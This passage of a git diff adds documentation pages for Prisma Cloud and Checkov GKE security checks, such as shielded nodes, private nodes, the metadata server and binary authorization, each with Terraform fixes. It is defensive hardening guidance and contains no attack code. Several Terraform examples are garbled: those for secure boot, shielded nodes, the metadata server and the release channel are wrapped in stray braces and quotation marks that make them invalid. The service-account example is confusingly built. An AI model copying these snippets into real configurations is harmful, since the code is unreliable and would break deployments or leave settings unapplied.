+  timeouts {
+    create = "30m"
+    update = "40m"
+  }
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-9.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-9.adoc
new file mode 100644
index 000000000..4048305a6
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-9.adoc
@@ -0,0 +1,68 @@
+== GCP Kubernetes Engine Clusters have pod security policy disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| b654ab07-f39a-4a35-9dac-2948a61e03c2
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEPodSecurityPolicyEnabled.py[CKV_GCP_24]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+*PodSecurityPolicy* is an admission controller resource created to validate requests to create and update Pods on your cluster.
+The *PodSecurityPolicy* defines a set of conditions that Pods must meet to be accepted by the cluster.
+When a request to create or update a Pod does not meet the conditions in the PodSecurityPolicy, that request is rejected and an error is returned.
+We recommend you enable the PodSecurityPolicy controller on Kubernetes Engine clusters.
+
+////
+=== Fix - Runtime
+
+
+*Gcloud CLI*
+
+
+To update the cluster to enable the PodSecurityPolicy controller, use this command:
+----
+gcloud beta container clusters update cluster-name --enable-pod-security-policy
+----
+More information at: https://cloud.google.com/kubernetes-engine/docs/how-to/pod-security-policies
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+First, be sure to have the *google-beta* provider set up in the *google_container_cluster*, then add the following block of code:
+
+
+[source,go]
+----
+pod_security_policy_config {
+  enabled = true
+}
+----
+
+More information at: https://www.terraform.io/docs/providers/google/r/container_cluster.html#pod_security_policy_config
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/enable-vpc-flow-logs-and-intranode-visibility.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/enable-vpc-flow-logs-and-intranode-visibility.adoc
new file mode 100644
index 000000000..6a8bbea62
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/enable-vpc-flow-logs-and-intranode-visibility.adoc
@@ -0,0 +1,56 @@
+== GCP Kubernetes cluster intra-node visibility disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| bee0893d-85fb-403f-9ba7-a5269a46d382
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEEnableVPCFlowLogs.py[CKV_GCP_61]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Enable VPC Flow Logs and Intranode Visibility to see pod-level traffic, even for traffic within a worker node.
+With this feature, you can use VPC Flow Logs or other VPC features for intranode traffic.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_container_cluster
+* *Arguments:* enable_intranode_visibility
+
+
+[source,go]
+----
+resource "google_container_cluster" "example" {
+  name     = var.name
+  location = var.location
+  project  = data.google_project.project.name
++ enable_intranode_visibility = true
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-clusters-are-created-with-private-nodes.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-clusters-are-created-with-private-nodes.adoc
new file mode 100644
index 000000000..b41b75f4e
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-clusters-are-created-with-private-nodes.adoc
@@ -0,0 +1,61 @@
+== GCP Kubernetes Engine Clusters not configured with private nodes feature
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| f5db1fcd-aa46-490e-9068-dd499ddb364b
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEPrivateNodes.py[CKV_GCP_64]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Disable public IP addresses for cluster nodes, so that they only have private IP addresses.
+Private Nodes are nodes with no public IP addresses.
+Disabling public IP addresses on cluster nodes restricts access to only internal networks, forcing attackers to obtain local network access before attempting to compromise the underlying Kubernetes hosts.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_container_cluster
+* *Arguments:* private_cluster_config
+
+
+[source,go]
+----
+resource "google_container_cluster" "example" {
+  name     = var.name
+  location = var.location
+  project  = data.google_project.project.name
+
++ private_cluster_config {
++   enable_private_nodes    = var.private_cluster_config["enable_private_nodes"]
++   enable_private_endpoint = var.private_cluster_config["enable_private_endpoint"]
++   master_ipv4_cidr_block  = var.private_cluster_config["master_ipv4_cidr_block"]
++ }
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-gke-clusters-are-not-running-using-the-compute-engine-default-service-account.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-gke-clusters-are-not-running-using-the-compute-engine-default-service-account.adoc
new file mode 100644
index 000000000..14fda25cf
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-gke-clusters-are-not-running-using-the-compute-engine-default-service-account.adoc
@@ -0,0 +1,89 @@
+== GCP Kubernetes Engine Cluster Nodes have default Service account for Project access
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| d4a28b1f-9a9b-4a40-874d-9da7f9d4e8a6
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GKEClustersAreNotUsingDefaultServiceAccount.yaml[CKV2_GCP_1]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Create and use minimally privileged Service accounts to run GKE cluster nodes instead of using the Compute Engine default Service account.
+Unnecessary permissions could be abused in the case of a node compromise.
+A GCP service account (as distinct from a Kubernetes ServiceAccount) is an identity that an instance or an application can use to run GCP API requests on your behalf.
+This identity is used to identify virtual machine instances to other Google Cloud Platform services.
+By default, Kubernetes Engine nodes use the Compute Engine default service account.
+This account has broad access by default, as defined by access scopes, making it useful to a wide variety of applications on the VM, but it has more permissions than are required to run your Kubernetes Engine cluster.
+You should create and use a minimally privileged service account to run your Kubernetes Engine cluster instead of using the Compute Engine default service account, and create separate service accounts for each Kubernetes Workload (See Recommendation 6.2.2).
+Kubernetes Engine requires, at a minimum, the node service account to have the monitoring.viewer, monitoring.metricWriter, and logging.logWriter roles.
+Additional roles may need to be added for the nodes to pull images from GCR.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_container_node_pool / google_container_cluster
+* *Arguments:* google_project_default_service_accounts
+
+
+[source,go]
+----
+resource "google_project_default_service_accounts" "not_ok" {
+  project = "my-project-id"
+  action  = "DELETE"
+  id      = "1234"
+}
+
+resource "google_container_node_pool" "primary_A_not_ok" {
+  name = "my-node-pool"
+  ...
+  node_config {
+-   service_account = google_project_default_service_accounts.not_ok.id
+    oauth_scopes = [
+      "https://www.googleapis.com/auth/cloud-platform"
+    ]
+  }
+}
+
+resource "google_container_cluster" "primary_B_not_ok" {
+  ...
+  node_config {
+-   service_account = google_project_default_service_accounts.not_ok.id
+    oauth_scopes = [
+      "https://www.googleapis.com/auth/cloud-platform"
+    ]
+  }
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-integrity-monitoring-for-shielded-gke-nodes-is-enabled.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-integrity-monitoring-for-shielded-gke-nodes-is-enabled.adoc
new file mode 100644
index 000000000..888f68b0a
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-integrity-monitoring-for-shielded-gke-nodes-is-enabled.adoc
@@ -0,0 +1,63 @@
+== GCP Kubernetes cluster shielded GKE node with integrity monitoring disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| d64da692-874d-48fd-9acf-391473ae94c9
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py[CKV_GCP_72]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Enable Integrity Monitoring for Shielded GKE Nodes to be notified of inconsistencies during the node boot sequence.
+Integrity Monitoring provides active alerting for Shielded GKE nodes, which allows administrators to respond to integrity failures and prevent compromised nodes from being deployed into the cluster.
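+
+A compliant sketch, with integrity monitoring explicitly enabled in the node configuration; the resource name and values are illustrative:
+
+[source,go]
+----
+resource "google_container_cluster" "pass" {
+  name               = "example-cluster"
+  location           = "us-central1"
+  initial_node_count = 1
+
+  node_config {
+    shielded_instance_config {
+      enable_integrity_monitoring = true
+    }
+  }
+}
+----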
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_container_cluster / google_container_node_pool
+* *Arguments:* node_config.shielded_instance_config.enable_integrity_monitoring
+
+
+[source,go]
+----
+resource "google_container_cluster" "fail" {
+  name               = var.name
+  location           = var.location
+  initial_node_count = 1
+  project            = data.google_project.project.name
+
+  node_config {
+    shielded_instance_config {
+-     enable_integrity_monitoring = false
+    }
+  }
+}
+----
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-legacy-compute-engine-instance-metadata-apis-are-disabled.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-legacy-compute-engine-instance-metadata-apis-are-disabled.adoc
new file mode 100644
index 000000000..922849fed
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-legacy-compute-engine-instance-metadata-apis-are-disabled.adoc
@@ -0,0 +1,63 @@
+== GCP Kubernetes Engine Clusters have legacy compute engine metadata endpoints enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 3c2b1b56-a6d4-41c1-b306-4edc2c840c19
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKELegacyInstanceMetadataDisabled.py[CKV_GCP_67]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Disable the legacy GCE instance metadata APIs for GKE nodes.
+Under some circumstances, these can be used from within a pod to extract the node's credentials.
+The legacy GCE metadata endpoint allows simple HTTP requests to be made returning sensitive information.
+To prevent the enumeration of metadata endpoints and data exfiltration, the legacy metadata endpoint must be disabled.
+Without requiring a custom HTTP header when accessing the legacy GCE metadata endpoint, a flaw in an application that allows an attacker to trick the code into retrieving the contents of an attacker-specified web URL could provide a simple method for enumeration and potential credential exfiltration.
+By requiring a custom HTTP header, the attacker needs to exploit an application flaw that allows them to control the URL and also add custom headers in order to carry out this attack successfully.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_container_cluster
+* *Arguments:* min_master_version
+
+
+[source,go]
+----
+resource "google_container_cluster" "example" {
+  name               = var.name
+  location           = var.location
+  initial_node_count = 1
+  project            = data.google_project.project.name
+
++ min_master_version = "1.12" // or higher
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-secure-boot-for-shielded-gke-nodes-is-enabled.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-secure-boot-for-shielded-gke-nodes-is-enabled.adoc
new file mode 100644
index 000000000..f4e385440
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-secure-boot-for-shielded-gke-nodes-is-enabled.adoc
@@ -0,0 +1,66 @@
+== GCP Kubernetes cluster shielded GKE node with Secure Boot disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 9a2b73c4-dfb2-4926-9198-c8524894ab7e
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py[CKV_GCP_68]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Enable Secure Boot for Shielded GKE Nodes to verify the digital signature of node boot components.
+An attacker may seek to alter boot components to persist malware or root kits during system initialization. +Secure Boot helps ensure that the system only runs authentic software by verifying the digital signature of all boot components, and halting the boot process if signature verification fails. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_container_cluster / google_container_node_pool +* *Arguments:* node_config.shielded_instance_config.enable_secure_boot + + +[source,go] +---- +{ + " +resource "google_container_cluster" "success" { + name = var.name + + ... + node_config { + workload_metadata_config { + node_metadata = "GKE_METADATA_SERVER" + } + + shielded_instance_config { +- enable_secure_boot = false + } + + }", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-shielded-gke-nodes-are-enabled.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-shielded-gke-nodes-are-enabled.adoc new file mode 100644 index 000000000..afd4f55a7 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-shielded-gke-nodes-are-enabled.adoc @@ -0,0 +1,64 @@ +== GCP Kubernetes cluster Shielded GKE Nodes feature disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7b14d2f7-0632-4adf-97c9-8c88b1d7f084 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEEnableShieldedNodes.py[CKV_GCP_71] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Shielded GKE Nodes provides verifiable integrity via secure boot, virtual trusted platform module (vTPM)-enabled measured boot, and integrity monitoring. +Shielded GKE nodes protects clusters against boot- or kernel-level malware or rootkits which persist beyond infected OS. 
+Shielded GKE nodes run firmware which is signed and verified using Google's Certificate Authority, ensuring that the nodes' firmware is unmodified and establishing the root of trust for Secure Boot. +GKE node identity is strongly protected via virtual Trusted Platform Module (vTPM) and verified remotely by the master node before the node joins the cluster. +Lastly, GKE node integrity (i.e., boot sequence and kernel) is measured and can be monitored and verified remotely. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_container_cluster +* *Arguments:* enable_shielded_nodes + + +[source,go] +---- +{ + "resource "google_container_cluster" "success" { + name = var.name + location = var.location + initial_node_count = 1 + project = data.google_project.project.name + ++ enable_shielded_nodes = true +} + + +", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-the-gke-metadata-server-is-enabled.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-the-gke-metadata-server-is-enabled.adoc new file mode 100644 index 000000000..d6e3e67a4 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-the-gke-metadata-server-is-enabled.adoc @@ -0,0 +1,67 @@ +== The GKE metadata server is disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2e464a60-e3ea-4e23-95a2-f7c5f7e624ec + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py[CKV_GCP_69] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Running the GKE Metadata Server prevents workloads from accessing sensitive instance metadata and facilitates Workload Identity. +Every node stores its metadata on a metadata server. 
+Some of this metadata, such as kubelet credentials and the VM instance identity token, is sensitive and should not be exposed to a Kubernetes workload. +Enabling the GKE Metadata server prevents pods (that are not running on the host network) from accessing this metadata and facilitates Workload Identity. +When unspecified, the default setting allows running pods to have full access to the node's underlying metadata server. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_container_cluster / google_container_node_pool +* *Arguments:* node_config.workload_metadata_config.node_metadata + + +[source,go] +---- +{ + "resource "google_container_cluster" "example" { + name = var.name + location = var.location + initial_node_count = 1 + project = data.google_project.project.name + ++ node_config { ++ workload_metadata_config { ++ node_metadata = "GKE_METADATA_SERVER" ++ } ++ } + +} + +", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-the-gke-release-channel-is-set.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-the-gke-release-channel-is-set.adoc new file mode 100644 index 000000000..40691c246 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-the-gke-release-channel-is-set.adoc @@ -0,0 +1,79 @@ +== GCP Kubernetes Engine cluster not using Release Channel for version management + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6b65e730-d5bf-400c-9a08-9721d6ccdf4a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEReleaseChannel.py[CKV_GCP_70] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The release channels allow organizations to better set their expectation of what is stable. 
+GKE's release channel options include "`rapid,`" "`regular,`" and "`stable.`" This allows you to opt for the alpha releases as part of the "`rapid`" option, "`regular`" for standard release needs and "`stable`" when the tried-and-tested version becomes available. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "google_container_cluster" "success" { + name = var.name + location = var.location + initial_node_count = 1 + project = data.google_project.project.name + + network = var.network + subnetwork = var.subnetwork + + ip_allocation_policy { + cluster_ipv4_cidr_block = var.ip_allocation_policy["cluster_ipv4_cidr_block"] + cluster_secondary_range_name = var.ip_allocation_policy["cluster_secondary_range_name"] + services_ipv4_cidr_block = var.ip_allocation_policy["services_ipv4_cidr_block"] + services_secondary_range_name = var.ip_allocation_policy["services_secondary_range_name"] + } + + + node_config { + workload_metadata_config { + node_metadata = "GKE_METADATA_SERVER" + } + + } + + release_channel { + channel = var.release_channel + } + + +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-use-of-binary-authorization.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-use-of-binary-authorization.adoc new file mode 100644 index 000000000..d825ac3e0 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-use-of-binary-authorization.adoc @@ -0,0 +1,60 @@ +== GCP Kubernetes Engine Clusters have binary authorization disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 50d5ec3b-1710-4ff7-bb09-061c30deef96 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEBinaryAuthorization.py[CKV_GCP_66] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks 
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Binary Authorization helps to protect supply-chain security by only allowing images with verifiable cryptographically signed metadata into the cluster.
+Binary Authorization provides software supply-chain security for images that you deploy to GKE from Google Container Registry (GCR) or another container image registry.
+Binary Authorization requires images to be signed by trusted authorities during the development process.
+These signatures are then validated at deployment time.
+By enforcing validation, you can gain tighter control over your container environment by ensuring only verified images are integrated into the build-and-release process.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* google_container_cluster
+* *Arguments:* enable_binary_authorization
+
+
+[source,go]
+----
+resource "google_container_cluster" "success" {
+  name               = var.name
+  location           = var.location
+  initial_node_count = 1
+  project            = data.google_project.project.name
++ enable_binary_authorization = true
+}
+----
+
diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/google-cloud-kubernetes-policies.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/google-cloud-kubernetes-policies.adoc
new file mode 100644
index 000000000..111cdb44f
--- /dev/null
+++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/google-cloud-kubernetes-policies.adoc
@@ -0,0 +1,139 @@
+== Google Cloud Kubernetes Policies
+
+[width=85%]
+[cols="1,1,1"]
+|===
+|Policy|Checkov Check ID| Severity
+
+|xref:bc-gcp-kubernetes-1.adoc[GCP Kubernetes Engine Clusters have Stackdriver Logging disabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEClusterLogging.py[CKV_GCP_1]
+|MEDIUM
+
+
+|xref:bc-gcp-kubernetes-10.adoc[GKE control plane is public]
+| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEPublicControlPlane.py[CKV_GCP_18] +|LOW + + +|xref:bc-gcp-kubernetes-11.adoc[GCP Kubernetes Engine Clusters Basic Authentication is set to Enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEBasicAuth.py[CKV_GCP_19] +|MEDIUM + + +|xref:bc-gcp-kubernetes-12.adoc[GCP Kubernetes Engine Clusters have Master authorized networks disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEMasterAuthorizedNetworksEnabled.py[CKV_GCP_20] +|MEDIUM + + +|xref:bc-gcp-kubernetes-13.adoc[GCP Kubernetes Engine Clusters without any label information] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEHasLabels.py[CKV_GCP_21] +|LOW + + +|xref:bc-gcp-kubernetes-14.adoc[GCP Kubernetes Engine Clusters not using Container-Optimized OS for Node image] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEUseCosImage.py[CKV_GCP_22] +|LOW + + +|xref:bc-gcp-kubernetes-15.adoc[GCP Kubernetes Engine Clusters have Alias IP disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEAliasIpEnabled.py[CKV_GCP_23] +|LOW + + +|xref:bc-gcp-kubernetes-2.adoc[GCP Kubernetes Engine Clusters have Legacy Authorization enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEDisableLegacyAuth.py[CKV_GCP_7] +|MEDIUM + + +|xref:bc-gcp-kubernetes-3.adoc[GCP Kubernetes Engine Clusters have Cloud Monitoring disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEMonitoringEnabled.py[CKV_GCP_8] +|MEDIUM + + +|xref:bc-gcp-kubernetes-4.adoc[GCP Kubernetes cluster node auto-repair configuration disabled] +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKENodePoolAutoRepairEnabled.py[CKV_GCP_9] +|MEDIUM + + +|xref:bc-gcp-kubernetes-5.adoc[GCP Kubernetes cluster node auto-upgrade configuration disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKENodePoolAutoUpgradeEnabled.py[CKV_GCP_10] +|MEDIUM + + +|xref:bc-gcp-kubernetes-6.adoc[GCP Kubernetes Engine private cluster has private endpoint disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEPrivateClusterConfig.py[CKV_GCP_25] +|MEDIUM + + +|xref:bc-gcp-kubernetes-7.adoc[GCP Kubernetes Engine Clusters have Network policy disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKENetworkPolicyEnabled.py[CKV_GCP_12] +|MEDIUM + + +|xref:bc-gcp-kubernetes-8.adoc[GCP Kubernetes engine clusters have client certificate disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEClientCertificateDisabled.py[CKV_GCP_13] +|LOW + + +|xref:bc-gcp-kubernetes-9.adoc[GCP Kubernetes Engine Clusters have pod security policy disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEPodSecurityPolicyEnabled.py[CKV_GCP_24] +|LOW + + +|xref:enable-vpc-flow-logs-and-intranode-visibility.adoc[GCP Kubernetes cluster intra-node visibility disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEEnableVPCFlowLogs.py[CKV_GCP_61] +|MEDIUM + + +|xref:ensure-clusters-are-created-with-private-nodes.adoc[GCP Kubernetes Engine Clusters not configured with private nodes feature] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEPrivateNodes.py[CKV_GCP_64] +|MEDIUM + + +|xref:ensure-gke-clusters-are-not-running-using-the-compute-engine-default-service-account.adoc[GCP 
Kubernetes Engine Cluster Nodes have default Service account for Project access] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GKEClustersAreNotUsingDefaultServiceAccount.yaml[CKV2_GCP_1] +|MEDIUM + + +|xref:ensure-integrity-monitoring-for-shielded-gke-nodes-is-enabled.adoc[GCP Kubernetes cluster shielded GKE node with integrity monitoring disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py[CKV_GCP_72] +|MEDIUM + + +|xref:ensure-legacy-compute-engine-instance-metadata-apis-are-disabled.adoc[GCP Kubernetes Engine Clusters have legacy compute engine metadata endpoints enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKELegacyInstanceMetadataDisabled.py[CKV_GCP_67] +|MEDIUM + + +|xref:ensure-secure-boot-for-shielded-gke-nodes-is-enabled.adoc[GCP Kubernetes cluster shielded GKE node with Secure Boot disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py[CKV_GCP_68] +|MEDIUM + + +|xref:ensure-shielded-gke-nodes-are-enabled.adoc[GCP Kubernetes cluster Shielded GKE Nodes feature disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEEnableShieldedNodes.py[CKV_GCP_71] +|MEDIUM + + +|xref:ensure-the-gke-metadata-server-is-enabled.adoc[The GKE metadata server is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py[CKV_GCP_69] +|LOW + + +|xref:ensure-the-gke-release-channel-is-set.adoc[GCP Kubernetes Engine cluster not using Release Channel for version management] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEReleaseChannel.py[CKV_GCP_70] +|MEDIUM + + +|xref:ensure-use-of-binary-authorization.adoc[GCP Kubernetes Engine Clusters have 
binary authorization disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEBinaryAuthorization.py[CKV_GCP_66] +|MEDIUM + + +|xref:manage-kubernetes-rbac-users-with-google-groups-for-gke.adoc[Kubernetes RBAC users are not managed with Google Groups for GKE] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEKubernetesRBACGoogleGroups.py[CKV_GCP_65] +|LOW + + +|=== + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/manage-kubernetes-rbac-users-with-google-groups-for-gke.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/manage-kubernetes-rbac-users-with-google-groups-for-gke.adoc new file mode 100644 index 000000000..177806019 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/manage-kubernetes-rbac-users-with-google-groups-for-gke.adoc @@ -0,0 +1,58 @@ +== Kubernetes RBAC users are not managed with Google Groups for GKE + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| afe5614d-a235-4a73-a885-c312aa5619dd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GKEKubernetesRBACGoogleGroups.py[CKV_GCP_65] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Cluster Administrators should leverage G Suite Groups and Cloud IAM to assign Kubernetes user roles to a collection of users, instead of to individual emails using only Cloud IAM. +On- and off-boarding users is often difficult to automate and prone to error. +Using a single source of truth for user permissions via G Suite Groups reduces the number of locations that an individual must be off-boarded from, and prevents users gaining unique permissions sets that increase the cost of audit. 
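
Once the cluster is configured with Google Groups for GKE (as in the buildtime fix that follows), Kubernetes roles can be bound to a group rather than to individual user emails. A sketch using the Terraform Kubernetes provider — the binding name, role, and group email are illustrative assumptions, not part of the policy source:

[source,hcl]
----
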